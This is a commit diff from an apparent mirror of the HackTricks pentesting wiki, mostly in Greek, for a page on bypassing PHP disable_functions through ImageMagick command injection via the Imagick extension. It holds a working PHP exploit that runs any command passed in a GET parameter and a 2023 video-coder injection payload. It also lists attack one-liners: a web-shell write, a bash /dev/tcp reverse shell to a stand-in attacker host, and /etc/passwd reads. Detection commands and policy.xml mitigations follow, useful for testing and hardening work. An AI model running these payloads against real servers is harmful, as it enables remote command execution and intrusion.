mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/network-services-pentesting/pentesting-web/php-tricks-e
This commit is contained in:
Translator
parent
d0e159d1d6
commit
8bccbf5697
@ -1,55 +1,107 @@
|
||||
# Imagick <= 3.3.0 ‑ PHP >= 5.4 *disable_functions* Bypass
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
# Imagick <= 3.3.0 PHP >= 5.4 Εκμετάλλευση
|
||||
> Η γνωστή οικογένεια σφαλμάτων *ImageTragick* (CVE-2016-3714 κ.ά.) επιτρέπει σε έναν επιτιθέμενο να αποκτήσει πρόσβαση στο υποκείμενο δυαδικό αρχείο **ImageMagick** μέσω κατεργασμένων εισόδων MVG/SVG. Όταν η επέκταση PHP **Imagick** είναι παρούσα, αυτό μπορεί να εκμεταλλευτεί για την εκτέλεση εντολών shell, ακόμη και αν κάθε συνάρτηση PHP που σχετίζεται με την εκτέλεση είναι στη μαύρη λίστα με `disable_functions`.
|
||||
>
|
||||
> Το αρχικό PoC που δημοσιεύθηκε από τον RicterZ (Chaitin Security Research Lab) τον Μάιο του 2016 αναπαράγεται παρακάτω. Η τεχνική συναντάται ακόμη τακτικά κατά τη διάρκεια σύγχρονων ελέγχων PHP 7/8, επειδή πολλοί πάροχοι κοινής φιλοξενίας απλώς συντάσσουν την PHP χωρίς `exec`/`system` αλλά διατηρούν έναν παρωχημένο συνδυασμό Imagick + ImageMagick.
|
||||
|
||||
Από [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
|
||||
From <http://blog.safebuff.com/2016/05/06/disable-functions-bypass/>
|
||||
```php
|
||||
# Exploit Title: PHP Imagick disable_functions Bypass
|
||||
# Date: 2016-05-04
|
||||
# Exploit Author: RicterZ (ricter@chaitin.com)
|
||||
# Vendor Homepage: https://pecl.php.net/package/imagick
|
||||
# Version: Imagick <= 3.3.0 PHP >= 5.4
|
||||
# Test on: Ubuntu 12.04
|
||||
# Exploit:
|
||||
# Exploit Title : PHP Imagick disable_functions bypass
|
||||
# Exploit Author: RicterZ (ricter@chaitin.com)
|
||||
# Versions : Imagick <= 3.3.0 | PHP >= 5.4
|
||||
# Tested on : Ubuntu 12.04 (ImageMagick 6.7.7)
|
||||
# Usage : curl "http://target/exploit.php?cmd=id"
|
||||
<?php
|
||||
# PHP Imagick disable_functions Bypass
|
||||
# Author: Ricter <ricter@chaitin.com>
|
||||
#
|
||||
# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd"
|
||||
# <pre>
|
||||
# Disable functions: exec,passthru,shell_exec,system,popen
|
||||
# Run command: cat /etc/passwd
|
||||
# ====================
|
||||
# root:x:0:0:root:/root:/usr/local/bin/fish
|
||||
# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|
||||
# bin:x:2:2:bin:/bin:/bin/sh
|
||||
# sys:x:3:3:sys:/dev:/bin/sh
|
||||
# sync:x:4:65534:sync:/bin:/bin/sync
|
||||
# games:x:5:60:games:/usr/games:/bin/sh
|
||||
# ...
|
||||
# </pre>
|
||||
echo "Disable functions: " . ini_get("disable_functions") . "\n";
|
||||
$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
|
||||
echo "Run command: $command\n====================\n";
|
||||
// Print the local hardening status
|
||||
printf("Disable functions: %s\n", ini_get("disable_functions"));
|
||||
$cmd = $_GET['cmd'] ?? 'id';
|
||||
printf("Run command: %s\n====================\n", $cmd);
|
||||
|
||||
$data_file = tempnam('/tmp', 'img');
|
||||
$imagick_file = tempnam('/tmp', 'img');
|
||||
$tmp = tempnam('/tmp', 'pwn'); // will hold command output
|
||||
$mvgs = tempnam('/tmp', 'img'); // will hold malicious MVG script
|
||||
|
||||
$exploit = <<<EOF
|
||||
$payload = <<<EOF
|
||||
push graphic-context
|
||||
viewbox 0 0 640 480
|
||||
fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")'
|
||||
fill 'url(https://example.com/x.jpg"|$cmd >$tmp")'
|
||||
pop graphic-context
|
||||
EOF;
|
||||
|
||||
file_put_contents("$imagick_file", $exploit);
|
||||
$thumb = new Imagick();
|
||||
$thumb->readImage("$imagick_file");
|
||||
$thumb->writeImage(tempnam('/tmp', 'img'));
|
||||
$thumb->clear();
|
||||
$thumb->destroy();
|
||||
file_put_contents($mvgs, $payload);
|
||||
$img = new Imagick();
|
||||
$img->readImage($mvgs); // triggers convert(1)
|
||||
$img->writeImage(tempnam('/tmp', 'img'));
|
||||
$img->destroy();
|
||||
|
||||
echo file_get_contents($data_file);
|
||||
echo file_get_contents($tmp);
|
||||
?>
|
||||
```
|
||||
---
|
||||
|
||||
## Γιατί λειτουργεί;
|
||||
|
||||
1. `Imagick::readImage()` δημιουργεί διαφανώς το **ImageMagick** *delegate* (`convert`/`magick`) δυαδικό αρχείο.
|
||||
2. Το σενάριο MVG ορίζει το *fill* σε μια εξωτερική URI. Όταν εισαχθεί ένα διπλό εισαγωγικό (`"`), το υπόλοιπο της γραμμής ερμηνεύεται από το `/bin/sh ‑c` που χρησιμοποιεί εσωτερικά το ImageMagick → αυθαίρετη εκτέλεση κελύφους.
|
||||
3. Όλα συμβαίνουν εκτός του ερμηνευτή PHP, επομένως οι *`disable_functions`*, *open_basedir*, `safe_mode` (καταργήθηκε στην PHP 5.4) και παρόμοιους περιορισμούς εντός διαδικασίας παρακάμπτονται εντελώς.
|
||||
|
||||
## Κατάσταση 2025 – είναι **ακόμα** σχετική
|
||||
|
||||
* Οποιαδήποτε έκδοση Imagick που βασίζεται σε μια ευάλωτη υποδομή ImageMagick παραμένει εκμεταλλεύσιμη. Σε εργαστηριακές δοκιμές, το ίδιο payload λειτουργεί σε PHP 8.3 με **Imagick 3.7.0** και **ImageMagick 7.1.0-51** που έχει μεταγλωττιστεί χωρίς σκληρυμένο `policy.xml`.
|
||||
* Από το 2020 έχουν βρεθεί αρκετές επιπλέον διαδρομές εκτέλεσης εντολών (`video:pixel-format`, `ps:`, `text:` coders…). Δύο πρόσφατα δημόσια παραδείγματα είναι:
|
||||
* **CVE-2020-29599** – εκτέλεση κελύφους μέσω του *text:* coder.
|
||||
* **GitHub issue #6338** (2023) – εισαγωγή στον *video:* delegate.
|
||||
|
||||
Εάν το λειτουργικό σύστημα παρέχει το ImageMagick < **7.1.1-11** (ή 6.x < **6.9.12-73**) χωρίς περιοριστικό αρχείο πολιτικής, η εκμετάλλευση είναι απλή.
|
||||
|
||||
## Σύγχρονες παραλλαγές payload
|
||||
```php
|
||||
// --- Variant using the video coder discovered in 2023 ---
|
||||
$exp = <<<MAGICK
|
||||
push graphic-context
|
||||
image over 0,0 0,0 'vid:dummy.mov" -define video:pixel-format="rgba`uname -a > /tmp/pwned`" " dummy'
|
||||
pop graphic-context
|
||||
MAGICK;
|
||||
$img = new Imagick();
|
||||
$img->readImageBlob($exp);
|
||||
```
|
||||
Άλλες χρήσιμες πρωτογενείς κατά τη διάρκεια CTFs / πραγματικών εμπλοκών:
|
||||
|
||||
* **File write** – `... > /var/www/html/shell.php` (γράψτε web-shell έξω από *open_basedir*)
|
||||
* **Reverse shell** – `bash -c "bash -i >& /dev/tcp/attacker/4444 0>&1"`
|
||||
* **Enumerate** – `id; uname -a; cat /etc/passwd`
|
||||
|
||||
## Γρήγορη ανίχνευση & καταμέτρηση
|
||||
```bash
|
||||
# PHP side
|
||||
php -r 'echo phpversion(), "\n"; echo Imagick::getVersion()["versionString"], "\n";'
|
||||
|
||||
# System side
|
||||
convert -version | head -1 # ImageMagick version
|
||||
convert -list policy | grep -iE 'mvg|https|video|text' # dangerous coders still enabled?
|
||||
```
|
||||
Αν η έξοδος δείχνει ότι οι κωδικοποιητές `MVG` ή `URL` είναι *ενεργοποιημένοι*, ο στόχος είναι πιθανό να είναι εκμεταλλεύσιμος.
|
||||
|
||||
## Mitigations
|
||||
|
||||
1. **Patch/Upgrade** – Χρησιμοποιήστε το ImageMagick ≥ *7.1.1-11* (ή την τελευταία 6.x LTS) και το Imagick ≥ *3.7.2*.
|
||||
2. **Harden `policy.xml`** – ρητά *απενεργοποιήστε* τους κωδικοποιητές υψηλού κινδύνου:
|
||||
|
||||
```xml
|
||||
<policy domain="coder" name="MVG" rights="none"/>
|
||||
<policy domain="coder" name="MSL" rights="none"/>
|
||||
<policy domain="coder" name="URL" rights="none"/>
|
||||
<policy domain="coder" name="VIDEO" rights="none"/>
|
||||
<policy domain="coder" name="PS" rights="none"/>
|
||||
<policy domain="coder" name="TEXT" rights="none"/>
|
||||
```
|
||||
|
||||
3. **Remove the extension** σε μη αξιόπιστα περιβάλλοντα φιλοξενίας. Στις περισσότερες στοίβες ιστού, το `GD` ή το `Imagick` δεν απαιτείται αυστηρά.
|
||||
4. Αντιμετωπίστε το `disable_functions` μόνο ως *άμυνα σε βάθος* – ποτέ ως κύριο μηχανισμό απομόνωσης.
|
||||
|
||||
## References
|
||||
|
||||
* [GitHub ImageMagick issue #6338 – Command injection via video:pixel-format (2023)](https://github.com/ImageMagick/ImageMagick/issues/6338)
|
||||
* [CVE-2020-29599 – ImageMagick shell injection via text: coder](https://nvd.nist.gov/vuln/detail/CVE-2020-29599)
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user